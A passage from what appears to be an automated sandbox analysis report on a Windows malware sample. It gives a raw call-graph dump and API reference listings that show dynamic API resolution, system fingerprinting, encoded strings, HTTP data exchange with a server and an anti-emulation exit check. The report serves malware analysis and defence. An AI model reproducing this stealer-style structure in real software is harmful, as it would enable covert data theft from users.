e440b6 26870->26871 26872 e44a60 2 API calls 26871->26872 26873 e440cc 26872->26873 26874 e44a60 2 API calls 26873->26874 26875 e440e2 26874->26875 26876 e44a60 2 API calls 26875->26876 26877 e440f8 26876->26877 26878 e44a60 2 API calls 26877->26878 26879 e44111 26878->26879 26880 e44a60 2 API calls 26879->26880 26881 e44127 26880->26881 26882 e44a60 2 API calls 26881->26882 26883 e4413d 26882->26883 26884 e44a60 2 API calls 26883->26884 26885 e44153 26884->26885 26886 e44a60 2 API calls 26885->26886 26887 e44169 26886->26887 26888 e44a60 2 API calls 26887->26888 26889 e4417f 26888->26889 26890 e44a60 2 API calls 26889->26890 26891 e44198 26890->26891 26892 e44a60 2 API calls 26891->26892 26893 e441ae 26892->26893 26894 e44a60 2 API calls 26893->26894 26895 e441c4 26894->26895 26896 e44a60 2 API calls 26895->26896 26897 e441da 26896->26897 26898 e44a60 2 API calls 26897->26898 26899 e441f0 26898->26899 26900 e44a60 2 API calls 26899->26900 26901 e44206 26900->26901 26902 e44a60 2 API calls 26901->26902 26903 e4421f 26902->26903 26904 e44a60 2 API calls 26903->26904 26905 e44235 26904->26905 26906 e44a60 2 API calls 26905->26906 26907 e4424b 26906->26907 26908 e44a60 2 API calls 26907->26908 26909 e44261 26908->26909 26910 e44a60 2 API calls 26909->26910 26911 e44277 26910->26911 26912 e44a60 2 API calls 26911->26912 26913 e4428d 26912->26913 26914 e44a60 2 API calls 26913->26914 26915 e442a6 26914->26915 26916 e44a60 2 API calls 26915->26916 26917 e442bc 26916->26917 26918 e44a60 2 API calls 26917->26918 26919 e442d2 26918->26919 26920 e44a60 2 API calls 26919->26920 26921 e442e8 26920->26921 26922 e44a60 2 API calls 26921->26922 26923 e442fe 26922->26923 26924 e44a60 2 API calls 26923->26924 26925 e44314 26924->26925 26926 e44a60 2 API calls 26925->26926 26927 e4432d 26926->26927 26928 e44a60 2 API calls 26927->26928 26929 e44343 26928->26929 26930 e44a60 2 API calls 26929->26930 26931 e44359 26930->26931 26932 e44a60 2 API calls 26931->26932 26933 e4436f 26932->26933 26934 e44a60 2 API calls 26933->26934 26935 e44385 26934->26935 26936 e44a60 2 API calls 26935->26936 26937 e4439b 26936->26937 26938 e44a60 2 API calls 26937->26938 26939 e443b4 26938->26939 26940 e44a60 2 API calls 26939->26940 26941 e443ca 26940->26941 26942 e44a60 2 API calls 26941->26942 26943 e443e0 26942->26943 26944 e44a60 2 API calls 26943->26944 26945 e443f6 26944->26945 26946 e44a60 2 API calls 26945->26946 26947 e4440c 26946->26947 26948 e44a60 2 API calls 26947->26948 26949 e44422 26948->26949 26950 e44a60 2 API calls 26949->26950 26951 e4443b 26950->26951 26952 e44a60 2 API calls 26951->26952 26953 e44451 26952->26953 26954 e44a60 2 API calls 26953->26954 26955 e44467 26954->26955 26956 e44a60 2 API calls 26955->26956 26957 e4447d 26956->26957 26958 e44a60 2 API calls 26957->26958 26959 e44493 26958->26959 26960 e44a60 2 API calls 26959->26960 26961 e444a9 26960->26961 26962 e44a60 2 API calls 26961->26962 26963 e444c2 26962->26963 26964 e44a60 2 API calls 26963->26964 26965 e444d8 26964->26965 26966 e44a60 2 API calls 26965->26966 26967 e444ee 26966->26967 26968 e44a60 2 API calls 26967->26968 26969 e44504 26968->26969 26970 e44a60 2 API calls 26969->26970 26971 e4451a 26970->26971 26972 e44a60 2 API calls 26971->26972 26973 e44530 26972->26973 26974 e44a60 2 API calls 26973->26974 26975 e44549 26974->26975 26976 e44a60 2 API calls 26975->26976 26977 e4455f 26976->26977 26978 e44a60 2 API calls 26977->26978 26979 e44575 26978->26979 26980 e44a60 2 API calls 26979->26980 26981 e4458b 26980->26981 26982 e44a60 2 API calls 26981->26982 26983 e445a1 26982->26983 26984 e44a60 2 API calls 26983->26984 26985 e445b7 26984->26985 26986 e44a60 2 API calls 26985->26986 26987 e445d0 26986->26987 26988 e44a60 2 API calls 26987->26988 26989 e445e6 26988->26989 26990 e44a60 2 API calls 26989->26990 26991 e445fc 26990->26991 26992 e44a60 2 API calls 26991->26992 26993 e44612 26992->26993 26994 e44a60 2 API calls 26993->26994 26995 e44628 26994->26995 26996 e44a60 2 API calls 26995->26996 26997 e4463e 26996->26997 26998 e44a60 2 API calls 26997->26998 26999 e44657 26998->26999 27000 e44a60 2 API calls 26999->27000 27001 e4466d 27000->27001 27002 e44a60 2 API calls 27001->27002 27003 e44683 27002->27003 27004 e44a60 2 API calls 27003->27004 27005 e44699 27004->27005 27006 e44a60 2 API calls 27005->27006 27007 e446af 27006->27007 27008 e44a60 2 API calls 27007->27008 27009 e446c5 27008->27009 27010 e44a60 2 API calls 27009->27010 27011 e446de 27010->27011 27012 e44a60 2 API calls 27011->27012 27013 e446f4 27012->27013 27014 e44a60 2 API calls 27013->27014 27015 e4470a 27014->27015 27016 e44a60 2 API calls 27015->27016 27017 e44720 27016->27017 27018 e44a60 2 API calls 27017->27018 27019 e44736 27018->27019 27020 e44a60 2 API calls 27019->27020 27021 e4474c 27020->27021 27022 e44a60 2 API calls 27021->27022 27023 e44765 27022->27023 27024 e44a60 2 API calls 27023->27024 27025 e4477b 27024->27025 27026 e44a60 2 API calls 27025->27026 27027 e44791 27026->27027 27028 e44a60 2 API calls 27027->27028 27029 e447a7 27028->27029 27030 e44a60 2 API calls 27029->27030 27031 e447bd 27030->27031 27032 e44a60 2 API calls 27031->27032 27033 e447d3 27032->27033 27034 e44a60 2 API calls 27033->27034 27035 e447ec 27034->27035 27036 e44a60 2 API calls 27035->27036 27037 e44802 27036->27037 27038 e44a60 2 API calls 27037->27038 27039 e44818 27038->27039 27040 e44a60 2 API calls 27039->27040 27041 e4482e 27040->27041 27042 e44a60 2 API calls 27041->27042 27043 e44844 27042->27043 27044 e44a60 2 API calls 27043->27044 27045 e4485a 27044->27045 27046 e44a60 2 API calls 27045->27046 27047 e44873 27046->27047 27048 e44a60 2 API calls 27047->27048 27049 e44889 27048->27049 27050 e44a60 2 API calls 27049->27050 27051 e4489f 27050->27051 27052 e44a60 2 API calls 27051->27052 27053 e448b5 27052->27053 27054 e44a60 2 API calls 27053->27054 27055 e448cb 27054->27055 27056 e44a60 2 API calls 27055->27056 27057 e448e1 27056->27057 27058 e44a60 2 API calls 27057->27058 27059 e448fa 27058->27059 27060 e44a60 2 API calls 27059->27060 27061 e44910 27060->27061 27062 e44a60 2 API calls 27061->27062 27063 e44926 27062->27063 27064 e44a60 2 API calls 27063->27064 27065 e4493c 27064->27065 27066 e44a60 2 API calls 27065->27066 27067 e44952 27066->27067 27068 e44a60 2 API calls 27067->27068 27069 e44968 27068->27069 27070 e44a60 2 API calls 27069->27070 27071 e44981 27070->27071 27072 e44a60 2 API calls 27071->27072 27073 e44997 27072->27073 27074 e44a60 2 API calls 27073->27074 27075 e449ad 27074->27075 27076 e44a60 2 API calls 27075->27076 27077 e449c3 27076->27077 27078 e44a60 2 API calls 27077->27078 27079 e449d9 27078->27079 27080 e44a60 2 API calls 27079->27080 27081 e449ef 27080->27081 27082 e44a60 2 API calls 27081->27082 27083 e44a08 27082->27083 27084 e44a60 2 API calls 27083->27084 27085 e44a1e 27084->27085 27086 e44a60 2 API calls 27085->27086 27087 e44a34 27086->27087 27088 e44a60 2 API calls 27087->27088 27089 e44a4a 27088->27089 27090 e666e0 27089->27090 27091 e66afe 8 API calls 27090->27091 27092 e666ed 43 API calls 27090->27092 27093 e66b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27091->27093 27094 e66c08 27091->27094 27092->27091 27093->27094 27095 e66c15 8 API calls 27094->27095 27096 e66cd2 27094->27096 27095->27096 27097 e66d4f 27096->27097 27098 e66cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27096->27098 27099 e66d5c 6 API calls 27097->27099 27100 e66de9 27097->27100 27098->27097 27099->27100 27101 e66df6 12 API calls 27100->27101 27102 e66f10 27100->27102 27101->27102 27103 e66f8d 27102->27103 27104 e66f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27102->27104 27105 e66f96 GetProcAddress GetProcAddress 27103->27105 27106 e66fc1 27103->27106 27104->27103 27105->27106 27107 e66ff5 27106->27107 27108 e66fca GetProcAddress GetProcAddress 27106->27108 27109 e67002 10 API calls 27107->27109 27110 e670ed 27107->27110 27108->27107 27109->27110 27111 e670f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27110->27111 27112 e67152 27110->27112 27111->27112 27113 e6716e 27112->27113 27114 e6715b GetProcAddress 27112->27114 27115 e67177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27113->27115 27116 e6051f 27113->27116 27114->27113 27115->27116 27117 e41530 27116->27117 27426 e41610 27117->27426 27119 e4153b 27120 e41555 lstrcpy 27119->27120 27121 e4155d 27119->27121 27120->27121 27122 e41577 lstrcpy 27121->27122 27123 e4157f 27121->27123 27122->27123 27124 e41599 lstrcpy 27123->27124 27125 e415a1 27123->27125 27124->27125 27126 e41605 27125->27126 27127 e415fd lstrcpy 27125->27127 27128 e5f1b0 lstrlen 27126->27128 27127->27126 27129 e5f1e4 27128->27129 27130 e5f1f7 lstrlen 27129->27130 27131 e5f1eb lstrcpy 27129->27131 27132 e5f208 27130->27132 27131->27130 27133 e5f20f lstrcpy 27132->27133 27134 e5f21b lstrlen 27132->27134 27133->27134 27135 e5f22c 27134->27135 27136 e5f233 lstrcpy 27135->27136 27137 e5f23f 27135->27137 27136->27137 27138 e5f258 lstrcpy 27137->27138 27139 e5f264 27137->27139 27138->27139 27140 e5f286 lstrcpy 27139->27140 27141 e5f292 27139->27141 27140->27141 27142 e5f2ba lstrcpy 27141->27142 27143 e5f2c6 27141->27143 27142->27143 27144 e5f2ea lstrcpy 27143->27144 27192 e5f300 27143->27192 27144->27192 27145 e5f30c lstrlen 27145->27192 27146 e5f4b9 lstrcpy 27146->27192 27147 e5f3a1 lstrcpy 27147->27192 27148 e5f3c5 lstrcpy 27148->27192 27149 e41530 8 API calls 27149->27192 27150 e5f4e8 lstrcpy 27193 e5f4f0 27150->27193 27151 e5f479 lstrcpy 27151->27192 27152 e5f59c lstrcpy 27152->27193 27153 e5f70f StrCmpCA 27158 e5fe8e 27153->27158 27153->27192 27154 e5f616 StrCmpCA 27154->27153 27154->27193 27155 e5fa29 StrCmpCA 27165 e5fe2b 27155->27165 27155->27192 27156 e5f73e lstrlen 27156->27192 27157 e5fd4d StrCmpCA 27160 e5fd60 Sleep 27157->27160 27171 e5fd75 27157->27171 27159 e5fead lstrlen 27158->27159 27163 e5fea5 lstrcpy 27158->27163 27164 e5fec7 27159->27164 27160->27192 27161 e5fa58 lstrlen 27161->27192 27162 e5f64a lstrcpy 27162->27193 27163->27159 27169 e5fee7 lstrlen 27164->27169 27174 e5fedf lstrcpy 27164->27174 27166 e5fe4a lstrlen 27165->27166 27167 e5fe42 lstrcpy 27165->27167 27173 e5fe64 27166->27173 27167->27166 27168 e5f89e lstrcpy 27168->27192 27183 e5ff01 27169->27183 27170 e5fd94 lstrlen 27185 e5fdae 27170->27185 27171->27170 27175 e5fd8c lstrcpy 27171->27175 27172 e5f76f lstrcpy 27172->27192 27178 e5fdce lstrlen 27173->27178 27179 e5fe7c lstrcpy 27173->27179 27174->27169 27175->27170 27176 e5fbb8 lstrcpy 27176->27192 27177 e5fa89 lstrcpy 27177->27192 27194 e5fde8 27178->27194 27179->27178 27180 e5f791 lstrcpy 27180->27192 27182 e5f8cd lstrcpy 27182->27193 27184 e5ff21 27183->27184 27187 e5ff19 lstrcpy 27183->27187 27188 e41610 4 API calls 27184->27188 27185->27178 27191 e5fdc6 lstrcpy 27185->27191 27186 e5fbe7 lstrcpy 27186->27193 27187->27184 27212 e5fe13 27188->27212 27189 e5faab lstrcpy 27189->27192 27190 e5f698 lstrcpy 27190->27193 27191->27178 27192->27145 27192->27146 27192->27147 27192->27148 27192->27149 27192->27150 27192->27151 27192->27153 27192->27155 27192->27156 27192->27157 27192->27161 27192->27168 27192->27172 27192->27176 27192->27177 27192->27180 27192->27182 27192->27186 27192->27189 27192->27193 27196 e5ee90 28 API calls 27192->27196 27200 e5f7e2 lstrcpy 27192->27200 27203 e5fafc lstrcpy 27192->27203 27193->27152 27193->27154 27193->27155 27193->27157 27193->27162 27193->27190 27193->27192 27197 e5efb0 35 API calls 27193->27197 27201 e5f924 lstrcpy 27193->27201 27202 e5f99e StrCmpCA 27193->27202 27204 e5fc3e lstrcpy 27193->27204 27205 e5fcb8 StrCmpCA 27193->27205 27206 e5f9cb lstrcpy 27193->27206 27207 e41530 8 API calls 27193->27207 27208 e5fce9 lstrcpy 27193->27208 27209 e5ee90 28 API calls 27193->27209 27210 e5fa19 lstrcpy 27193->27210 27211 e5fd3a lstrcpy 27193->27211 27195 e5fe08 27194->27195 27198 e5fe00 lstrcpy 27194->27198 27199 e41610 4 API calls 27195->27199 27196->27192 27197->27193 27198->27195 27199->27212 27200->27192 27201->27193 27202->27155 27202->27193 27203->27192 27204->27193 27205->27157 27205->27193 27206->27193 27207->27193 27208->27193 27209->27193 27210->27193 27211->27193 27212->26236 27214 e62785 27213->27214 27215 e6278c GetVolumeInformationA 27213->27215 27214->27215 27216 e627ec GetProcessHeap RtlAllocateHeap 27215->27216 27218 e62826 wsprintfA 27216->27218 27219 e62822 27216->27219 27218->27219 27436 e671e0 27219->27436 27223 e44c70 27222->27223 27224 e44c85 27223->27224 27225 e44c7d lstrcpy 27223->27225 27440 e44bc0 27224->27440 27225->27224 27227 e44c90 27228 e44ccc lstrcpy 27227->27228 27229 e44cd8 27227->27229 27228->27229 27230 e44cff lstrcpy 27229->27230 27231 e44d0b 27229->27231 27230->27231 27232 e44d2f lstrcpy 27231->27232 27233 e44d3b 27231->27233 27232->27233 27234 e44d6d lstrcpy 27233->27234 27235 e44d79 27233->27235 27234->27235 27236 e44da0 lstrcpy 27235->27236 27237 e44dac InternetOpenA StrCmpCA 27235->27237 27236->27237 27238 e44de0 27237->27238 27239 e454b8 InternetCloseHandle CryptStringToBinaryA 27238->27239 27444 e63e70 27238->27444 27240 e454e8 LocalAlloc 27239->27240 27260 e455d8 27239->27260 27242 e454ff CryptStringToBinaryA 27240->27242 27240->27260 27243 e45517 LocalFree 27242->27243 27244 e45529 lstrlen 27242->27244 27243->27260 27246 e4553d 27244->27246 27245 e44dfa 27249 e44e23 lstrcpy lstrcat 27245->27249 27250 e44e38 27245->27250 27247 e45557 lstrcpy 27246->27247 27248 e45563 lstrlen 27246->27248 27247->27248 27252 e4557d 27248->27252 27249->27250 27251 e44e5a lstrcpy 27250->27251 27254 e44e62 27250->27254 27251->27254 27253 e4558f lstrcpy lstrcat 27252->27253 27256 e455a2 27252->27256 27253->27256 27255 e44e71 lstrlen 27254->27255 27258 e44e89 27255->27258 27257 e455d1 27256->27257 27259 e455c9 lstrcpy 27256->27259 27257->27260 27261 e44e95 lstrcpy lstrcat 27258->27261 27262 e44eac 27258->27262 27259->27257 27260->26265 27261->27262 27263 e44ed5 27262->27263 27264 e44ecd lstrcpy 27262->27264 27265 e44edc lstrlen 27263->27265 27264->27263 27266 e44ef2 27265->27266 27267 e44efe lstrcpy lstrcat 27266->27267 27268 e44f15 27266->27268 27267->27268 27269 e44f36 lstrcpy 27268->27269 27270 e44f3e 27268->27270 27269->27270 27271 e44f65 lstrcpy lstrcat 27270->27271 27272 e44f7b 27270->27272 27271->27272 27273 e44fa4 27272->27273 27274 e44f9c lstrcpy 27272->27274 27275 e44fab lstrlen 27273->27275 27274->27273 27276 e44fc1 27275->27276 27277 e44fcd lstrcpy lstrcat 27276->27277 27278 e44fe4 27276->27278 27277->27278 27279 e4500d 27278->27279 27280 e45005 lstrcpy 27278->27280 27281 e45014 lstrlen 27279->27281 27280->27279 27282 e4502a 27281->27282 27283 e45036 lstrcpy lstrcat 27282->27283 27284 e4504d 27282->27284 27283->27284 27285 e45079 27284->27285 27286 e45071 lstrcpy 27284->27286 27287 e45080 lstrlen 27285->27287 27286->27285 27288 e4509b 27287->27288 27289 e450ac lstrcpy lstrcat 27288->27289 27290 e450bc 27288->27290 27289->27290 27291 e450da lstrcpy lstrcat 27290->27291 27292 e450ed 27290->27292 27291->27292 27293 e4510b lstrcpy 27292->27293 27294 e45113 27292->27294 27293->27294 27295 e45121 InternetConnectA 27294->27295 27295->27239 27296 e45150 HttpOpenRequestA 27295->27296 27297 e454b1 InternetCloseHandle 27296->27297 27298 e4518b 27296->27298 27297->27239 27451 e67310 lstrlen 27298->27451 27302 e451a4 27459 e672c0 27302->27459 27305 e67280 lstrcpy 27306 e451c0 27305->27306 27307 e67310 3 API calls 27306->27307 27308 e451d5 27307->27308 27309 e67280 lstrcpy 27308->27309 27310 e451de 27309->27310 27311 e67310 3 API calls 27310->27311 27312 e451f4 27311->27312 27313 e67280 lstrcpy 27312->27313 27314 e451fd 27313->27314 27315 e67310 3 API calls 27314->27315 27316 e45213 27315->27316 27317 e67280 lstrcpy 27316->27317 27318 e4521c 27317->27318 27319 e67310 3 API calls 27318->27319 27320 e45231 27319->27320 27321 e67280 lstrcpy 27320->27321 27322 e4523a 27321->27322 27323 e672c0 2 API calls 27322->27323 27324 e4524d 27323->27324 27325 e67280 lstrcpy 27324->27325 27326 e45256 27325->27326 27327 e67310 3 API calls 27326->27327 27328 e4526b 27327->27328 27329 e67280 lstrcpy 27328->27329 27330 e45274 27329->27330 27331 e67310 3 API calls 27330->27331 27332 e45289 27331->27332 27333 e67280 lstrcpy 27332->27333 27334 e45292 27333->27334 27335 e672c0 2 API calls 27334->27335 27336 e452a5 27335->27336 27337 e67280 lstrcpy 27336->27337 27338 e452ae 27337->27338 27339 e67310 3 API calls 27338->27339 27340 e452c3 27339->27340 27341 e67280 lstrcpy 27340->27341 27342 e452cc 27341->27342 27343 e67310 3 API calls 27342->27343 27344 e452e2 27343->27344 27345 e67280 lstrcpy 27344->27345 27346 e452eb 27345->27346 27347 e67310 3 API calls 27346->27347 27348 e45301 27347->27348 27349 e67280 lstrcpy 27348->27349 27350 e4530a 27349->27350 27351 e67310 3 API calls 27350->27351 27352 e4531f 27351->27352 27353 e67280 lstrcpy 27352->27353 27354 e45328 27353->27354 27355 e672c0 2 API calls 27354->27355 27356 e4533b 27355->27356 27357 e67280 lstrcpy 27356->27357 27358 e45344 27357->27358 27359 e45370 lstrcpy 27358->27359 27360 e4537c 27358->27360 27359->27360 27361 e672c0 2 API calls 27360->27361 27362 e4538a 27361->27362 27363 e672c0 2 API calls 27362->27363 27364 e45397 27363->27364 27365 e67280 lstrcpy 27364->27365 27366 e453a1 27365->27366 27367 e453b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27366->27367 27368 e4549c InternetCloseHandle 27367->27368 27372 e453f2 27367->27372 27370 e454ae 27368->27370 27369 e453fd lstrlen 27369->27372 27370->27297 27371 e4542e lstrcpy lstrcat 27371->27372 27372->27368 27372->27369 27372->27371 27373 e45473 27372->27373 27374 e4546b lstrcpy 27372->27374 27375 e4547a InternetReadFile 27373->27375 27374->27373 27375->27368 27375->27372 27377 e58cc6 ExitProcess 27376->27377 27378 e58ccd 27376->27378 27379 e58ee2 27378->27379 27380 e58d84 StrCmpCA 27378->27380 27381 e58da4 StrCmpCA 27378->27381 27382 e58d06 lstrlen 27378->27382 27383 e58e6f StrCmpCA 27378->27383 27384 e58e88 lstrlen 27378->27384 27385 e58e56 StrCmpCA 27378->27385 27386 e58d30 lstrlen 27378->27386 27387 e58dbd StrCmpCA 27378->27387 27388 e58ddd StrCmpCA 27378->27388 27389 e58dfd StrCmpCA 27378->27389 27390 e58e1d StrCmpCA 27378->27390 27391 e58e3d StrCmpCA 27378->27391 27392 e58d5a lstrlen 27378->27392 27393 e58ebb lstrcpy 27378->27393 27379->26267 27380->27378 27381->27378 27382->27378 27383->27378 27384->27378 27385->27378 27386->27378 27387->27378 27388->27378 27389->27378 27390->27378 27391->27378 27392->27378 27393->27378 27394->26273 27395->26275 27396->26281 27397->26283 27398->26289 27399->26291 27400->26297 27401->26301 27402->26307 27403->26309 27404->26313 27405->26327 27406->26331 27407->26330 27408->26325 27409->26330 27410->26348 27411->26333 27412->26336 27413->26337 27414->26344 27415->26345 27416->26351 27417->26358 27418->26360 27419->26384 27420->26388 27421->26387 27422->26383 27423->26387 27424->26397 27427 e4161f 27426->27427 27428 e4162b lstrcpy 27427->27428 27429 e41633 27427->27429 27428->27429 27430 e4164d lstrcpy 27429->27430 27432 e41655 27429->27432 27430->27432 27431 e41677 27434 e41699 27431->27434 27435 e41691 lstrcpy 27431->27435 27432->27431 27433 e4166f lstrcpy 27432->27433 27433->27431 27434->27119 27435->27434 27437 e671e6 27436->27437 27438 e62860 27437->27438 27439 e671fc lstrcpy 27437->27439 27438->26262 27439->27438 27441 e44bd0 27440->27441 27441->27441 27442 e44bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27441->27442 27443 e44c41 27442->27443 27443->27227 27445 e63e83 27444->27445 27446 e63e9f lstrcpy 27445->27446 27447 e63eab 27445->27447 27446->27447 27448 e63ed5 GetSystemTime 27447->27448 27449 e63ecd lstrcpy 27447->27449 27450 e63ef3 27448->27450 27449->27448 27450->27245 27453 e6732d 27451->27453 27452 e4519b 27455 e67280 27452->27455 27453->27452 27454 e6733d lstrcpy lstrcat 27453->27454 27454->27452 27456 e6728c 27455->27456 27457 e672b4 27456->27457 27458 e672ac lstrcpy 27456->27458 27457->27302 27458->27457 27460 e672dc 27459->27460 27461 e451b7 27460->27461 27462 e672ed lstrcpy lstrcat 27460->27462 27461->27305 27462->27461 27487 e631f0 GetSystemInfo wsprintfA 27477 e68471 120 API calls 2 library calls 27463 e5e0f9 140 API calls 27514 e56b79 138 API calls 27479 e48c79 strcpy_s 27496 e5f2f8 93 API calls 27505 e4bbf9 90 API calls 27515 e41b64 162 API calls 27516 e58615 49 API calls 27464 e63cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27506 e633c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27481 e5e049 147 API calls 27507 e58615 48 API calls 27482 e62853 lstrcpy 27465 e62cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27488 e501d9 126 API calls 27493 e53959 244 API calls 27500 e48e20 strcpy_s free std::exception::exception 27466 e630a0 GetSystemPowerStatus 27489 e629a0 GetCurrentProcess IsWow64Process 27508 e523a9 298 API calls 27518 e54b29 303 API calls 27494 e63130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27509 e5abb2 120 API calls 27497 e416b9 200 API calls 27502 e4f639 144 API calls 27521 e4bf39 177 API calls 27467 e62880 10 API calls 27468 e64480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27469 e63480 6 API calls 27498 e63280 7 API calls 27483 e4100d GetCurrentProcess VirtualAllocExNuma ExitProcess VirtualAlloc VirtualFree 27470 e58c88 16 API calls 27522 e4b309 98 API calls 27495 e64e35 8 API calls 27523 e47710 free ctype 27484 e62c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27524 e69711 128 API calls __setmbcp 27471 e6749e 5 API calls ctype 27473 e52499 290 API calls 27510 e4db99 672 API calls 27486 e68819 free free free __getptd 27511 e58615 47 API calls

                                Executed Functions

                                Function 00E44C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E44C7F
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E44CD2
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E44D05
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E44D35
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E44D73
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E44DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E44DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 3f3da6db30aaebc5e24250ae462c373d1aa36c175c5c13fa390dba12a11ff629
                                • Instruction ID: 08b965cc94f36bbccb11c36e39b4b2d6455f1ee8cfce58364987e41da1816d84
                                • Opcode Fuzzy Hash: 3f3da6db30aaebc5e24250ae462c373d1aa36c175c5c13fa390dba12a11ff629
                                • Instruction Fuzzy Hash: 62528E72E112159BCB21EFA4EC49BAE7BF9AF44314F146028F945F7241DB34ED428BA0
                                Function 00E66390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2125 e66390-e663bd GetPEB 2126 e665c3-e66623 LoadLibraryA * 5 2125->2126 2127 e663c3-e665be call e662f0 GetProcAddress * 20 2125->2127 2128 e66625-e66633 GetProcAddress 2126->2128 2129 e66638-e6663f 2126->2129 2127->2126 2128->2129 2131 e66641-e66667 GetProcAddress * 2 2129->2131 2132 e6666c-e66673 2129->2132 2131->2132 2134 e66675-e66683 GetProcAddress 2132->2134 2135 e66688-e6668f 2132->2135 2134->2135 2137 e666a4-e666ab 2135->2137 2138 e66691-e6669f GetProcAddress 2135->2138 2139 e666d7-e666da 2137->2139 2140 e666ad-e666d2 GetProcAddress * 2 2137->2140 2138->2137 2140->2139
                                APIs
                                • GetProcAddress.KERNEL32(77190000,016C15E8), ref: 00E663E9
                                • GetProcAddress.KERNEL32(77190000,016C1600), ref: 00E66402
                                • GetProcAddress.KERNEL32(77190000,016C1768), ref: 00E6641A
                                • GetProcAddress.KERNEL32(77190000,016C1720), ref: 00E66432
                                • GetProcAddress.KERNEL32(77190000,016C8B08), ref: 00E6644B
                                • GetProcAddress.KERNEL32(77190000,016B53A8), ref: 00E66463
                                • GetProcAddress.KERNEL32(77190000,016B54A8), ref: 00E6647B
                                • GetProcAddress.KERNEL32(77190000,016C1618), ref: 00E66494
                                • GetProcAddress.KERNEL32(77190000,016C1738), ref: 00E664AC
                                • GetProcAddress.KERNEL32(77190000,016C16A8), ref: 00E664C4
                                • GetProcAddress.KERNEL32(77190000,016C1690), ref: 00E664DD
                                • GetProcAddress.KERNEL32(77190000,016B5688), ref: 00E664F5
                                • GetProcAddress.KERNEL32(77190000,016C16C0), ref: 00E6650D
                                • GetProcAddress.KERNEL32(77190000,016C1780), ref: 00E66526
                                • GetProcAddress.KERNEL32(77190000,016B53C8), ref: 00E6653E
                                • GetProcAddress.KERNEL32(77190000,016C17C8), ref: 00E66556
                                • GetProcAddress.KERNEL32(77190000,016C1798), ref: 00E6656F
                                • GetProcAddress.KERNEL32(77190000,016B54C8), ref: 00E66587
                                • GetProcAddress.KERNEL32(77190000,016C1810), ref: 00E6659F
                                • GetProcAddress.KERNEL32(77190000,016B56E8), ref: 00E665B8
                                • LoadLibraryA.KERNEL32(016C18B8,?,?,?,00E61C03), ref: 00E665C9
                                • LoadLibraryA.KERNEL32(016C17F8,?,?,?,00E61C03), ref: 00E665DB
                                • LoadLibraryA.KERNEL32(016C1828,?,?,?,00E61C03), ref: 00E665ED
                                • LoadLibraryA.KERNEL32(016C1840,?,?,?,00E61C03), ref: 00E665FE
                                • LoadLibraryA.KERNEL32(016C1858,?,?,?,00E61C03), ref: 00E66610
                                • GetProcAddress.KERNEL32(76850000,016C1870), ref: 00E6662D
                                • GetProcAddress.KERNEL32(77040000,016C1888), ref: 00E66649
                                • GetProcAddress.KERNEL32(77040000,016C18A0), ref: 00E66661
                                • GetProcAddress.KERNEL32(75A10000,016C8FC0), ref: 00E6667D
